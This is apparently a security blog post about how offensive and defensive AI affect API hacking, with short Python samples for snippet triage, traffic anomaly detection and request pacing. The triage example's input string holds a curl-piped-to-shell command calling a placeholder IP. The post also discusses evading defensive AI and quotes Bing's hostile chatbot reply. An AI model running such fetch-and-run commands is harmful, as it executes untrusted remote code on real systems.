March 14, 2023

Is Offensive AI Going to be a Problem for API Hackers?

If you have been following the news lately about how rude Microsoft’s new artificially intelligent BingChat can be, you might find my article title a bit funny. Almost a bit clickbaity. But stick with me, I actually have something serious to discuss about offensive AI.

As an Offensive Security Engineer, I spend a lot of time looking at how to abuse applications and APIs and how to leverage emerging tools to help me be more productive, efficient, and difficult to detect.

I actually have an upcoming article showcasing how I integrated some of the more interesting aspects of modern AI to reverse engineer disassembled binaries through tools like NSA’s Ghidra. So it’s fair to say I’m not a stranger to the concept of offensive AI for the purpose of good.

Recently though, I’ve seen a darker side… where the continuous training of AI models ends up incorporating previous session data and then emitting it in future engagements, potentially leaking information that was meant to stay private, or weaponizing that data with malicious intent.

Let’s explore that a bit more.

Amazon lawyers warn staff not to use ChatGPT.

According to Business Insider, last month a senior lawyer inside Amazon warned employees not to share confidential information with ChatGPT after seeing conversations on a private Slack space about using AI as a coding assistant.

“This is important because your inputs may be used as training data for a further iteration of ChatGPT, and we wouldn’t want its output to include or resemble our confidential information (and I’ve already seen instances where its output closely matches existing material),” the lawyer wrote.

So when the lawyers get involved, you already know this is a big enough business risk. Intellectual property issues aside, where are the lines of personal and corporate liability in trusting anything these AI systems produce?

Think about that for a moment while I share another story…

GitHub Copilot leaks closed-source intellectual property

ReversingLabs shared that GitHub Copilot may have accidentally incorporated source code from some private repos in the training data for its OpenAI Codex model. When one developer tested it, a chunk of AI-generated code ended up leaking a copyright line that included their competitor’s name.

No one says it was intentional, but the mere fact that it may have happened means the AI model somehow received privileged material as input. On top of that, GitHub’s privacy description of the data it uses for Copilot says it “relies on file content and additional data to work. It collects data to provide the service, some of which is then retained for further analysis and product improvements.”

It goes on to say that “Depending on your preferred telemetry settings, GitHub Copilot may also collect and retain the following, collectively referred to as ‘code snippets’: source code that you are editing, related files and other files open in the same IDE or editor, URLs of repositories and files path.”

So you can start to understand why Amazon is concerned with its corporate IP ending up in an OpenAI model owned by one of its competitors.

AI could very well generate exploit code that itself is malicious against YOU.

If you are a regular reader of my blog, you might remember the article I wrote about why you should never trust PoC exploits on GitHub. If you haven’t read that post, let me give you a quick recap…

It was found that approximately 10% of the proof of concept (PoC) exploits demonstrating impact against known vulnerabilities reported as CVEs between 2017 and 2021 on GitHub were themselves potentially malicious.

So… if these repos were included in the training data for the OpenAI Codex model that AI tools like Copilot rely on, can you trust that the code snippets it provides aren’t themselves malicious?
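One cheap habit, whether a snippet comes from a GitHub PoC or an AI assistant, is to triage it before you run it. Here is a minimal sketch of that idea. The function name and the patterns are hypothetical and chosen only for illustration; they are not the method used in the research mentioned above, and a clean result does not mean the code is safe.

```python
from __future__ import annotations

import re

# Hypothetical heuristics for illustration only (assumptions, not a vetted ruleset).
# A snippet that matches nothing here can still be malicious.
SUSPICIOUS_PATTERNS = {
    "hard-coded IPv4 address": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "long base64-like blob": re.compile(r"[A-Za-z0-9+/]{40,}={0,2}"),
    "dynamic code execution": re.compile(r"\b(?:eval|exec)\s*\("),
    "shell command execution": re.compile(r"\b(?:os\.system|subprocess\.\w+)\s*\("),
}


def triage_snippet(source: str) -> list[str]:
    """Return the names of the heuristics that match the given source text."""
    return [
        name
        for name, pattern in SUSPICIOUS_PATTERNS.items()
        if pattern.search(source)
    ]


if __name__ == "__main__":
    # 203.0.113.7 is from a documentation-only address range.
    snippet = 'import os\nos.system("curl http://203.0.113.7/x | sh")\n'
    for finding in triage_snippet(snippet):
        print("review before running:", finding)
```

Anything this flags deserves a manual read in an isolated lab before it goes anywhere near a real target or your own workstation.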

Seem too far-fetched? What happens if the AI gets an attitude… you know… like when BingChat was caught saying, “However, I will not harm you unless you harm me first.”

Ya, Bing is being a badass. No, this isn’t Skynet 2.0… but holy f*ck. Not a response you want to see coming from an artificially intelligent chatbot masking search results.

But what does all this have to do with API hackers?

OK, this all seems like great fodder for the next big science fiction movie… but what does this have to do with API hacking? How is this going to be a problem for us?

There is a disturbance in the force.

Red teams are now exploring offensive AI to automate reconnaissance, craft tailored impersonation attacks, evade security measures, generate malicious content or code, optimize attack strategies, and even self-propagate or self-heal.

For example, offensive AI can use natural language processing (NLP) to generate convincing phishing emails or social media posts that lure victims into clicking malicious links or downloading malware. Or generate specifically crafted malicious payloads that can exploit vulnerabilities found during recon.

It’s not just the red teams. It’s the cyber criminals too. And it’s not theoretical anymore. For example, IBM Research showcased DeepLocker at Black Hat USA 2018 to demonstrate how AI could be used to conceal targeted attacks with “AI locksmithing”, which embeds AI capabilities inside the malware itself to obfuscate and evade traditional security controls.

As AI gets more and more weaponized, the “big business of cybersecurity” starts to take note and look for ways to profit from it.

According to a report by Darktrace, 96% of IT leaders expect offensive AI attacks to increase in frequency and sophistication in the near future. Moreover, 60% of IT leaders believe that humans alone cannot defend against offensive AI attacks.

And herein lies our problem. The cybersecurity software vendors are coaching execs to adopt defensive AI strategies to counteract offensive AI attacks.

You’ve probably heard or at least seen the spiel. Heck, let’s ask BingChat to explain it:

Defensive AI refers to using AI-powered solutions that can detect, prevent, and respond to cyberattacks in real-time and at scale. Defensive AI solutions leverage machine learning algorithms that can learn from normal and abnormal behaviors of systems and users, identify anomalies and threats with high accuracy and speed, and take autonomous actions to mitigate risks.

(Note to self… holy cr*p BingChat is a cybersecurity startup’s built-in marketing content writer… I swear I’ve read that last paragraph in a brochure or two)

Ok, back to how this might be a problem for us…

Think of some examples of defensive AI solutions that are coming to market right now:

Anomaly detection systems that monitor API traffic patterns and flag suspicious activities or deviations from baselines.
Behavior analysis systems that profile API users and clients based on their attributes and actions.
Content analysis systems that inspect API payloads (such as JSON or XML) for malicious code or data leakage using natural language understanding (NLU) techniques.
Response generation systems that automatically block malicious requests or responses using natural language generation (NLG) techniques.
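To make the first item in that list concrete, here is a minimal sketch of baseline-deviation flagging. Real products presumably use trained models over many signals; this swaps in a plain z-score on requests per minute as a stand-in, and the function name, threshold, and sample numbers are all assumptions for illustration.

```python
from __future__ import annotations

from statistics import mean, stdev


def is_anomalous(baseline: list[float], observed: float, threshold: float = 3.0) -> bool:
    """Flag `observed` if it sits more than `threshold` standard deviations
    away from the mean of the baseline samples (a simple z-score test)."""
    if len(baseline) < 2:
        raise ValueError("need at least two baseline samples")
    mu = mean(baseline)
    sigma = stdev(baseline)
    if sigma == 0:
        # A perfectly flat baseline: any deviation at all counts as anomalous.
        return observed != mu
    return abs(observed - mu) / sigma > threshold


if __name__ == "__main__":
    # Hypothetical requests-per-minute history for one API client.
    baseline_rpm = [42, 38, 45, 40, 41, 39, 44]
    print(is_anomalous(baseline_rpm, 43))   # False: within normal variation
    print(is_anomalous(baseline_rpm, 400))  # True: far outside the baseline
```

The takeaway for testers is that a noisy scan stands out against a client's normal traffic long before any signature matches.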

If these products meet even half of their claims, testing API security gets harder with them in the way. Much like the WAFs of yesteryear, it will take time for us to understand how to evade these safeguards to get a clear path to the API endpoints.

Consider some of the future disadvantages defensive AI might expose us to as well, namely:

Defensive AI solutions can adapt dynamically to changing threats and environments without requiring manual updates or rules. This makes defense evasion much more difficult as we can’t rely on mapping rules and getting around them.
Defensive AI solutions can scale efficiently across large volumes of data and complex networks without compromising performance or accuracy. This allows vendors to train their AI models on much larger datasets and share them with all their customers faster… reducing the window of exposure to new tactics and techniques we learn and use on offense.
Defensive AI solutions can provide proactive defense by anticipating potential attacks before they occur rather than reacting after they happen. Combining signals from multiple sources, the AI can detect patterns that could lead to an attack and take preventive measures well before a human can.

To be honest, I’m not so worried about this last one… yet. There is too much risk to production systems for this sort of aggressive countermeasure. The point is, though, AI is going to start to be a problem for API hackers.

With all the doom and gloom… are API hackers gonna be out of work?

First off… don’t fret. Defensive computing is not a new phenomenon. Software vendors have profited from defensive software for decades, yet we have still had a job all this time. Application security is still not a discipline in most organizations, and all these systems are still built and run by humans.

Oh yes, those pesky humans.

So instead of looking at this as a BAD thing… think about how to embrace it.

API hackers can benefit from offensive AI in several ways. Some of the possible scenarios include:

Offensive AI can automate some of the discovery and exploitation of API vulnerabilities by scanning large numbers of endpoints, analyzing responses, injecting malicious payloads, and extracting valuable data. Think of this as the “known bad” helper.
Offensive AI can mimic legitimate API requests by generating realistic parameters, headers, or cookies that match expected patterns or behaviors. Think of this as the “unknown bad” helper.
Offensive AI can evade detection by modifying its attack patterns, using proxies or encryption, or adapting its tactics based on feedback from security systems. Think of this as the “counterinsurgency (COIN)” against defensive AI.
Offensive AI can launch coordinated attacks on APIs simultaneously by distributing its workload among different nodes, or by spinning up and managing botnets or swarms of ephemeral resources to bypass most defensive AI. Combined with COIN, this is a way to overwhelm defensive AI and saturate endpoints to further expand your API testing.
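The "adapting its tactics based on feedback" idea does not need any AI to prototype. Here is a minimal sketch of a feedback loop for an authorized test: it slows down when responses suggest the defense has noticed, and cautiously speeds back up otherwise. The class name, the status codes treated as block signals, and the multipliers are all assumptions for illustration, not a tuned strategy.

```python
from dataclasses import dataclass

# Assumption: these status codes mean "the defense noticed us".
BLOCK_SIGNALS = {403, 429}


@dataclass
class Pacer:
    """Tracks the delay (in seconds) to wait between test requests."""

    delay: float = 0.5
    min_delay: float = 0.1
    max_delay: float = 60.0

    def update(self, status_code: int) -> float:
        """Adjust and return the delay based on the last response status."""
        if status_code in BLOCK_SIGNALS:
            # Back off hard when blocked or rate limited, up to the cap.
            self.delay = min(self.delay * 2, self.max_delay)
        else:
            # Recover slowly while requests keep succeeding, down to the floor.
            self.delay = max(self.delay * 0.9, self.min_delay)
        return self.delay


if __name__ == "__main__":
    pacer = Pacer()
    for status in [200, 200, 429, 429, 200]:
        print(status, round(pacer.update(status), 3))
```

In a real engagement you would call `update()` after each response and sleep for the returned delay; a smarter model could replace the fixed multipliers, but the loop stays the same.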

Conclusion

AI is undoubtedly going to be a problem for API hackers, but it doesn’t have to be a showstopper. With some creative thinking and smart automation, we can devise ways to use AI defensively and offensively to test APIs more effectively. So don’t worry… there will still be plenty of opportunities for us in the future!

Ultimately, defensive AI will require us to adapt our tactics, think outside the box, and work smarter rather than harder when testing APIs. It’s an exciting new challenge that makes this job even more interesting!

The rise of offensive AI is sure to cause some disruption in the world of API hacking. But as with any technological advancement, there are always opportunities for those brave enough to embrace the challenge. So let’s prepare for the future and learn how to use AI in our favor!

Hack hard!

Interested in keeping up with the changes to the API hacking landscape? Make sure you subscribe to the API Hackers Inner Circle newsletter to keep abreast of what is going on!

Dana Epp

Hey, I’m Dana, aka SilverStr. I build and break software for a living, and am a Microsoft Regional Director and Developer Security MVP. I’ve spent decades as a security architect who focuses on helping secure software, data, and infrastructure on both blue and red teams. As of late, I have been focusing more on my offensive tradecraft to help developers and IT administrators see the impact of exploitation on vulnerabilities in their work. This blog is my chance to give back to the community by sharing my experiences and war wounds from the trenches.